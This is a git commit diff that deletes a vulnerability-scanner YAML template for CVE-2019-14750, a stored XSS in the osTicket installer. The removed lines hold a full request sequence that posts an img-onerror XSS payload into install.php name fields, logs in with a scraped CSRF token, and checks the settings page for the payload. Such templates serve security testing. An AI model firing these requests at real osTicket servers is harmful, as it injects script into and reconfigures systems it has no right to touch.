Delete CVE-2019-14750.yaml

2022-09-01 00:38:28 +09:00 · 2022-09-01 00:38:28 +09:00 · d2398e5769
parent 833f05f9df
commit d2398e5769
1 changed files with 0 additions and 61 deletions
--- a/cves/2019/CVE-2019-14750.yaml
+++ b/cves/2019/CVE-2019-14750.yaml
@ -1,61 +0,0 @@
-id: CVE-2019-14750
-info:
-  name: osTicket Stored XSS before 1.10.7 and 1.12.x before 1.12.1
-  author: TenBird
-  severity: Medium
-  description: An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-14750
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cve-id: CVE-2019-14750
-    cwe-id: CWE-79
-  tags: cve,cve2019,Stored XSS,Cross-Site-Script
-
-requests:
-  - raw:
-
-      - |
-        POST /upload/setup/install.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        
-        s=install&name=test&email=test%40test.com&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email=test222%40test.com&username=test&passwd=asdf1234&passwd2=asdf1234&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo
-
-      - |
-        GET /upload/scp/login.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-       
-      - |
-        POST /upload/scp/login.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        
-        __CSRFToken__={{csrftoken}}&do=scplogin&userid=test&passwd=asdf1234&ajax=1
-       
-      - |
-        GET /upload/scp/settings.php HTTP/1.1
-        Host: {{Hostname}}
-
-    redirects: true
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - '<img src=x onerror=alert(1);>'
-
-    extractors:
-      - type: regex
-        name: csrftoken
-        part: body
-        group: 1
-        regex:
-          - '__CSRFToken__" value="(.*?)"'
-        internal: true